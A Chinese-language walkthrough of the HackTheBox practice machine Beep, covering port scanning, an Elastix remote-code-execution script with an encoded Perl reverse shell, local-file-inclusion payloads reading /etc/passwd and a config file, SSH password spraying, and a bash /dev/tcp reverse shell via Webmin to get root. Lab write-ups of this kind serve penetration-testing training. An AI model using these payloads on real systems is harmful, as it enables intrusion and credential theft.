首页 文章详情

渗透测试靶机练习No.147 HTB:Beep(OSCP Prep)

伏波 | 174 2024-04-29 12:06 0 0 0
UniSMS (合一短信)

0e2498d0ceb2da7faeccbf1bd17ba397.webp

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Beep

靶场: HackTheBox.com

靶机名称:Beep

难度: 简单

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.3
 
 靶机:10.10.10.7

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo nmap -p- 10.10.10.7

2a23c2c47513a3939fa7330ae7af36b2.webp

 sudo nmap -sC -sV -p 22,25,80,110,111,143,443,3306,4190,4445,4559,5038,10000 10.10.10.7 -oN nmap.log

894874fa6a34cc991bbc2e9d24348972.webp

靶机开放多个端口22(SSH),25、110、143(SMTP、POP3、IMAP),80、443、10000(HTTP/s),3306(MYSQL)等,先来看看80端口。

TCP:80(HTTP)

 http://10.10.10.7

06f2e2787da91b38ba032115ec12eb5d.webp

^___^:如果你访问时出现下面情况是因为新的浏览器不支持TLS1.2以下的加密协议,解决这个问题很简单,搜索引擎上有答案。

79927d35d6e0a8a939e6673312285fbd.webp

访问后直接跳转到https登录页面,页面正文发现程序名称为Elastix,到搜索引擎上找找是否存在漏洞

漏洞利用(Exploitation)

e1fb29b18ca2a35339c32a21fe30149b.webp

搜索引擎提供了两个漏洞LFI(本地文件包含)和RCE(远程代码执行)漏洞,先来看看远程代码执行的exp

RCE远程代码执行漏洞

 https://www.exploit-db.com/exploits/18650

5b5f5073f294fd906c6954e81e54e7ec.webp

执行exp前需要做些准备

修改exp中的IP并保存为RCEexp.py,并将urllib.urlopen修改为urllib.request.urlopen

 import requests
 from requests_toolbelt import SSLAdapter
 requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'DEFAULT:@SECLEVEL=1'
 
 rhost="10.10.10.7"
 lhost="10.10.16.4"
 lport=443
 extension="223"
 
 req = requests.Session()
 adapter = SSLAdapter('TLSv1')
 req.mount('https://',adapter)
 # Reverse shell payload
 
 url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
 req.get(url,verify=False)

bf21582abb16d6ad45ef0ba30817c2ff.webp

这里的证书问题一直处理不好,再来看看LFI漏洞

https://www.exploit-db.com/exploits/37637

ad72e5506b1c98007fd740f9fc29861b.webp

这里有段文件包含的payload,直接拿来用

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

bfbb8524c8e0ccecca448529e178e4c6.webp

执行后在配置文件中发现mysql数据库和管理员用户名而且两个密码是相同的,其他用户密码会不会相同,再来看看有哪些用户

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

fa79594cfc24d20d7423a4c735e4ac59.webp

发现多个可以登录的账号,用刚获得的密码与账号匹配登录SSH

密码喷洒

hydra -L user.txt -p jEhdIekWmdjE ssh://10.10.10.7

fe6f77bdfa31717d7028646160257bac.webp

暴破失败,换msf试试EXP

msfconsole -q
search Elastix
use 0

cb08be308340a7ba12080896ecd8295c.webp

找到EXP,看看哪些选项需要配置

options

2871f60f7535e5375a29755c363626a6.webp

配置下选项并执行

set EXTENSION 0-500
set RHOSTS 10.10.10.7
set RPORT 443
set SSL true
set LHOST 10.10.16.5
run

78e5f1b2317838f92d444b7df557ac0e.webp

攻击失败还是openssl问题,再来看看1000端口

TCP:10000(HTTP:Webmin)

https://10.10.10.7:10000/

1bc7991a116aa9728fd1248d2dcd3ce3.webp

登录后发现是Webmin,用之前的密码 jEhdIekWmdjE 和root账号试试能否登录

a90bc79a67358a95ae87618e36027521.webp

登录成功,太棒了,终于可以拿shell了,

d214db5ad40b9710587a2c867570c7ef.webp

攻击机监听443端口

sudo nc -lvvp 443

2983da9b9ffc4b9b0ddcdb2f2a71916d.webp

执行反弹payload

bash -c 'bash -i >& /dev/tcp/10.10.16.5/443 0>&1'

2127dfab31ed1cd794f9d9c5d601fc63.webp

86b7923f7c600ad1fe98d60df8651891.webp

拿到shell并且是root权限,来找下flag

cd /home
cat fanis/user.txt
cat /root/root.txt

235a53c47f8df779b6b7e04f1aebd5f4.webp

拿到flag,游戏结束

518a42913c059d1d877b68ac7b46b5b0.webp

378febaf736c3c29a6de7e0b6d0ee7ab.webp

eabee1d9bbc8ee9fd2030b9ba7b53910.webp

good-icon 0
favorite-icon 0
收藏
回复数量: 0
    暂无评论~~
    Ctrl+Enter